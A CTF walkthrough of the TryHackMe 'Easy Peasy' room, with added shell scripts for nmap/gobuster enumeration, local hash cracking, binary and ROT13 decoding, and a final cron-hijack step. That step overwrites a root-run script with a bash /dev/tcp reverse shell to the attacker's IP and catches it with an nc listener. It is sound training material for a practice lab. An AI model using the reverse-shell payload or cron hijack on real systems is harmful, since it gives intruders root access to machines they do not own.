EasyPeasy
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Try this challenge in TryHackMe: Easy Peasy
I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: TryHackMe: Easy Peasy Write-up by Kevin De Vijlder
To answer the next two questions, let's run an nmap scan to list the open ports on the IP assigned to us. Replace 10.10.X.X with the IP given to you.
The scan uses -sT (TCP connect scan), which completes the full three-way handshake, so it works without root privileges but is noisier than a SYN scan.
Two of the services in this room sit well above nmap's default top-1000 ports, so scan the full range (-p-) or they will not show up.
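The scan step above as a script, added here as an example that is not part of the original write-up: the nmap and gobuster invocations used in this room wrapped in functions, plus a parser for nmap's grepable (-oG) output so the open ports can be pulled out of a saved scan instead of read off the screen. 10.10.X.X is the room's placeholder address, and the -oG data in demo() is a constructed sample, not real scan output.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up). scan_host and enum_dirs call the real
# tools; open_ports parses saved -oG output; demo runs it over a constructed file.
set -eu

# scan_host TARGET OUTFILE: TCP connect scan of every port with service detection.
# -oG writes the one-line-per-host grepable format that open_ports parses.
scan_host() {
  nmap -sT -p- -sV --open -oG "$2" "$1"
}

# enum_dirs BASEURL WORDLIST: directory brute-force, e.g. http://10.10.X.X:65524/
enum_dirs() {
  gobuster dir -u "$1" -w "$2" -x txt,html,php
}

# open_ports GNMAP_FILE -> one "port/proto service" line per open port.
# Each entry in the Ports: field is "port/state/proto/owner/service/rpcinfo/version/".
open_ports() {
  awk -F'Ports: ' '/Ports:/ {
    n = split($2, entries, ", ")
    for (i = 1; i <= n; i++) {
      split(entries[i], f, "/")
      if (f[2] == "open") printf "%s/%s %s\n", f[1], f[3], f[5]
    }
  }' "$1"
}

# demo: parse a constructed -oG file carrying the three ports this room relies
# on (80, 6498 and 65524); version fields are deliberately left empty.
demo() {
  tmp=$(mktemp)
  {
    printf '# Nmap grepable output (constructed sample)\n'
    printf 'Host: 10.10.X.X ()\tStatus: Up\n'
    printf 'Host: 10.10.X.X ()\tPorts: 80/open/tcp//http///, 6498/open/tcp//ssh///, 65524/open/tcp//http///\tIgnored State: closed (65532)\n'
  } > "$tmp"
  open_ports "$tmp"
  rm -f "$tmp"
}

demo
```

On the target you would run `scan_host 10.10.X.X scan.gnmap` and then `open_ports scan.gnmap`; the parser is what lets you feed the port list into further tooling without retyping it.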
Run gobuster against http://10.10.X.X/
It reports a /hidden directory. Run gobuster again against http://10.10.X.X/hidden
Go to http://10.10.X.X/hidden/whatever
Copy the hidden hash
A hash is not decrypted, only cracked or looked up. For a quick result, paste it into an online lookup such as https://hashes.com/en/decrypt/hash (fine for a CTF flag; never do this with hashes from a real engagement).
Run gobuster against http://10.10.X.X:65524
Check http://10.10.X.X:65524/robots.txt
In the User-Agent field there's a hash.
To guess the hash type, use hash-identifier. It only goes by length and character set, so a 32-hex-character value could equally be MD5, MD4 or NTLM; the crack is what confirms the guess.
Crack the hash with an online MD5 lookup.
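Both hash steps above (the hidden hash from /hidden/whatever and the one in robots.txt) come down to the same two operations, shown here as an added example that is not part of the original write-up: guess the algorithm from the digest's shape, as hash-identifier does, then hash candidate words and compare, which is all an online "decrypter" does with a far larger wordlist. The wordlist in demo() is constructed; in practice you would point crack_hash at rockyou.txt or hand the digest to john or hashcat.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): local hash classification and
# wordlist attack with coreutils md5sum/sha1sum/sha256sum.
set -eu

# hash_kind HEXDIGEST -> md5 | sha1 | sha256 | unknown. Length and charset only,
# which is all hash-identifier has to go on: a 32-hex digest could also be MD4
# or NTLM, so treat the answer as a guess to be confirmed by a successful crack.
hash_kind() {
  case $1 in
    *[!0-9A-Fa-f]*|'') echo unknown; return 0 ;;
  esac
  case ${#1} in
    32) echo md5 ;;
    40) echo sha1 ;;
    64) echo sha256 ;;
    *)  echo unknown ;;
  esac
}

# crack_hash HEXDIGEST WORDLIST -> prints the first word whose digest matches and
# returns 0; returns 1 if nothing matches, 2 if the digest type is unsupported.
crack_hash() {
  target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  case $(hash_kind "$target") in
    md5)    tool=md5sum ;;
    sha1)   tool=sha1sum ;;
    sha256) tool=sha256sum ;;
    *)      echo "unsupported digest: $1" >&2; return 2 ;;
  esac
  # printf, not echo: echo appends a newline and you end up hashing the wrong bytes
  while IFS= read -r word || [ -n "$word" ]; do
    if [ "$(printf '%s' "$word" | $tool | cut -d' ' -f1)" = "$target" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done < "$2"
  return 1
}

# demo: constructed three-word wordlist; the last word is hashed with MD5 to
# stand in for the unknown value from the page, then recovered.
demo() {
  wl=$(mktemp)
  printf '%s\n' letmein password123 easypeasy > "$wl"
  crack_hash "$(printf '%s' easypeasy | md5sum | cut -d' ' -f1)" "$wl"
  rm -f "$wl"
}

demo
```

The `printf` versus `echo` point is the one that bites in practice: a hash computed over "word\n" never matches a hash of "word", and the lookup silently fails.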
From our nmap scan, go to http://10.10.X.X:65524
Flag 3 is written in plain sight on the web page.
When you View the Page Source of http://10.10.X.X:65524, you'll see a hidden field holding an encoded value.
We'll use CyberChef to decode it with the From Base6X operation (explore the options available in CyberChef; this is an encoding, not a hash, so it decodes fully).
When you go to the hidden directory, you'll see a picture.
Save the image with its default name.
We'll use steghide to extract the message hidden in the image,
but a passphrase is needed to extract it.
Let's View the Page Source of the image page for clues. We indeed retrieve a hash.
Save the hash to a file named hash.txt
To crack the hash, use John the Ripper against hash.txt with a wordlist.
Going back to steghide, enter the passphrase that we cracked.
A file secrettext.txt is extracted. View the contents of the file.
We get a username boring and a password written as binary numbers that need to be decoded.
Use a Binary to Text converter tool online like this:
https://www.rapidtables.com/convert/number/binary-to-ascii.html
From our previous nmap scan, SSH is on port 6498 rather than 22, so connect with ssh -p 6498 boring@10.10.X.X using the decoded password.
From the Hint, we got the term "Rotated", which suggests the flag is encoded with ROT13 (a rotation cipher, not encryption). Using CyberChef, we decode the flag.
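The two decodes above (the binary password from secrettext.txt and the rotated flag) done locally, as an added example that is not part of the original write-up. Doing this in the shell rather than an online converter is the habit worth building: credentials from a real engagement should never be pasted into a third-party site. The inputs used in the comments are constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): POSIX-shell binary-to-text and ROT13.
set -eu

# bin2ascii BITSTRING -> text. Accepts "01101000 01101001" or "0110100001101001";
# anything other than 0/1 (spaces, newlines) is stripped before decoding.
bin2ascii() {
  bits=$(printf '%s' "$1" | tr -cd '01')
  if [ $(( ${#bits} % 8 )) -ne 0 ]; then
    echo "bit count ${#bits} is not a multiple of 8" >&2
    return 1
  fi
  out=''
  while [ -n "$bits" ]; do
    byte=$(printf '%s' "$bits" | cut -c1-8)
    bits=$(printf '%s' "$bits" | cut -c9-)
    # binary -> decimal by hand so no bc or bash-only 2#... arithmetic is needed
    dec=0
    i=1
    while [ "$i" -le 8 ]; do
      bit=$(printf '%s' "$byte" | cut -c"$i")
      dec=$(( dec * 2 + bit ))
      i=$(( i + 1 ))
    done
    # decimal -> three-digit octal escape -> character
    out="$out$(printf "\\$(printf '%03o' "$dec")")"
  done
  printf '%s\n' "$out"
}

# rot13 TEXT -> each letter rotated 13 places; applying it twice gives the input back
rot13() {
  printf '%s\n' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# constructed inputs: "01100010 01101111 01110010 01101001 01101110 01100111" is "boring"
bin2ascii '01100010 01101111 01110010 01101001 01101110 01100111'
rot13 'Uryyb'
```

bin2ascii rejects input whose length is not a multiple of 8, which is the usual sign that a bit was dropped while copying the password out of the file.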
From the description of this room, we are expected to escalate our privileges through a vulnerable cronjob.
The cron job's script is located in /var/www.
Listing the cron entries shows that mysecretcronjob.sh runs as root. Check the script's permissions with ls -l: the escalation only works because our low-privileged user can write to a file that root executes.
Since the cronjob runs with root privileges, we can set up a netcat listener on our machine and have the script hand us a reverse shell.
Let's craft our payload:
Take a reverse shell one-liner from pentestmonkey's reverse shell cheat sheet and replace the contents of mysecretcronjob.sh with it.
*use your machine IP & port 5556, and start the listener (nc -lvnp 5556) before the next cron run
Now wait for cron to execute the script; the shell that comes back runs as root.
We can see the flag in the .root.txt file (the leading dot hides it from a plain ls, so use ls -la).
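The escalation above as working shell, added here as an example that is not part of the original write-up: a check that turns "there's a cron script in /var/www" into a confirmed finding by listing cron entries whose command the current user can write to, and the payload step that replaces such a script with pentestmonkey's bash /dev/tcp reverse shell. Everything in demo() is constructed in a temporary directory; on the target the same function would be run over /etc/crontab and the files in /etc/cron.d.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): writable-cron-target check plus payload.
set -eu

# writable_cron_targets CRONTAB_FILE -> "user script" for each entry whose command
# is an absolute path the current user can write to. Handles the system crontab
# layout (min hour dom mon dow user command). Entries like "root bash /opt/x.sh"
# would need the interpreter's first argument inspected too; that is left out here.
writable_cron_targets() {
  grep -Ev '^[[:space:]]*#|^[[:space:]]*$|^[A-Za-z_]+=' "$1" |
  while read -r _min _hour _dom _mon _dow user cmd _rest; do
    case $cmd in
      /*) if [ -w "$cmd" ]; then printf '%s %s\n' "$user" "$cmd"; fi ;;
    esac
  done
}

# plant_reverse_shell SCRIPT ATTACKER_IP PORT: overwrite SCRIPT with the bash
# /dev/tcp reverse shell from pentestmonkey's cheat sheet. Cron runs the script
# as the crontab entry's user, so a root entry hands back a root shell.
plant_reverse_shell() {
  printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$2" "$3" > "$1"
}

# listen PORT: the catcher to start on the attacking machine before cron fires
listen() {
  nc -lvnp "$1"
}

# demo: a constructed crontab with one root entry pointing at a world-writable
# script (the misconfiguration) and one pointing at a path that does not exist.
demo() {
  dir=$(mktemp -d)
  script="$dir/mysecretcronjob.sh"          # stand-in for /var/www/mysecretcronjob.sh
  printf '#!/bin/bash\necho housekeeping\n' > "$script"
  chmod 777 "$script"
  printf '%s\n' \
    '# constructed /etc/crontab' \
    'SHELL=/bin/sh' \
    "* * * * * root $script" \
    '0 3 * * * root /nonexistent/cleanup.sh' \
    > "$dir/crontab"
  writable_cron_targets "$dir/crontab"
  rm -rf "$dir"
}

demo
```

On the target: `writable_cron_targets /etc/crontab`, then `plant_reverse_shell /var/www/mysecretcronjob.sh <your IP> 5556` with `listen 5556` already running on your machine, and wait for the next cron interval. The shell arrives as whichever user the crontab names, which is why a root entry on a writable script is a full compromise.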